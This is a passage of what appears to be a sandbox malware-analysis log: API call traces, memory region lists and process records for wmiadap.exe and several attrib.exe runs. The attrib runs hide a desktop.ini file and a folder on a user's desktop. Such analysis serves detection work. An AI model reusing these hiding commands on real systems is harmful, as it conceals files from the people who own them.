FreeEnvironmentStringsW (penv=0x2f3668) returned 1 [0226.315] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f414 | out: lpAttributeList=0x22f414) [0226.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0226.315] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0226.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0226.315] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0226.315] _get_osfhandle (_FileHandle=0) returned 0x3 [0226.315] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0226.315] SetConsoleInputExeNameW () returned 0x1 [0226.315] GetConsoleOutputCP () returned 0x1b5 [0226.315] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0226.315] SetThreadUILanguage (LangId=0x0) returned 0x409 [0226.315] exit (_Code=0) Process: id = "596" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x7ea168e0" os_pid = 
"0xd3c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "298" os_parent_pid = "0x358" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000b277" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 33707 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33708 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33709 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33710 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33711 start_va = 0x830000 end_va = 0x84efff entry_point = 0x830000 region_type = mapped_file name = "wmiadap.exe" filename = "\\Windows\\System32\\wbem\\WMIADAP.exe" 
(normalized: "c:\\windows\\system32\\wbem\\wmiadap.exe") Region: id = 33712 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33713 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33714 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33715 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33716 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33837 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33838 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33839 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 33840 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 33841 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 33842 start_va = 0x71e10000 end_va = 0x71e2efff entry_point = 0x71e10000 region_type = mapped_file 
name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 33843 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33844 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 33845 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 33846 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33847 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 33848 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33849 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 33850 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33851 start_va = 0x76b40000 end_va = 
0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33852 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 33853 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33854 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 33855 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 33856 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33857 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33858 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 33859 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33860 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = 
"\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33964 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33965 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33966 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 33967 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 33968 start_va = 0x300000 end_va = 0x37ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 33969 start_va = 0x3b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 33970 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 33971 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 33972 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 33973 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 33974 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 33975 start_va = 0x780000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 33976 
start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 33977 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 33978 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 33979 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 33980 start_va = 0x6e0000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 33981 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 33982 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 33983 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 33984 start_va = 0x850000 end_va = 0xb1efff entry_point = 0x850000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 33985 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: 
"c:\\windows\\system32\\rpcrtremote.dll") Region: id = 33986 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 33987 start_va = 0xb80000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 33988 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 33989 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33990 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 33991 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 33992 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 34023 start_va = 0x75820000 end_va = 0x75824fff entry_point = 0x75820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Thread: id = 820 os_tid = 0xe8c Thread: id = 822 os_tid = 0x240 Thread: id = 823 os_tid = 0x24c Thread: id = 824 os_tid = 0x37c Thread: id = 825 os_tid = 0xfb4 Thread: id = 826 os_tid = 0x720 Thread: id = 944 os_tid = 0xed0 Process: id = "597" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d40" os_pid = "0xdb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" 
monitor_reason = "child_process" parent_id = "595" os_parent_pid = "0xc84" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33934 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33935 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 33936 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 33937 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 33938 start_va = 0x530000 end_va = 0x536fff entry_point = 0x530000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 33939 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33940 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33941 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33942 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33943 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33944 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33945 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33946 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 33947 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 33948 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33949 start_va = 0x71df0000 end_va = 0x71e0cfff entry_point = 0x71df0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 33950 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33951 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 33952 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = 
"lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33953 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33954 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 33955 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33956 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33957 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33958 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 33959 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33960 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33961 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" 
filename = "" Region: id = 33962 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33963 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 821 os_tid = 0xbf4 Process: id = "598" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e80" os_pid = "0x8e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "595" os_parent_pid = "0xc84" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33993 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33994 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33995 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33996 start_va = 0x110000 end_va = 0x116fff entry_point = 0x110000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 33997 start_va = 
0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 33998 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33999 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34000 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34001 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34002 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34003 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34004 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34005 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34006 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 34007 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 34008 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" 
filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34009 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34010 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34011 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34012 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34013 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34014 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34015 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34016 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34017 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 
0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34018 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34019 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34020 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 34021 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34022 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 828 os_tid = 0xd68 Process: id = "599" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e80" os_pid = "0xd88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "595" os_parent_pid = "0xc84" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34024 start_va = 0x10000 
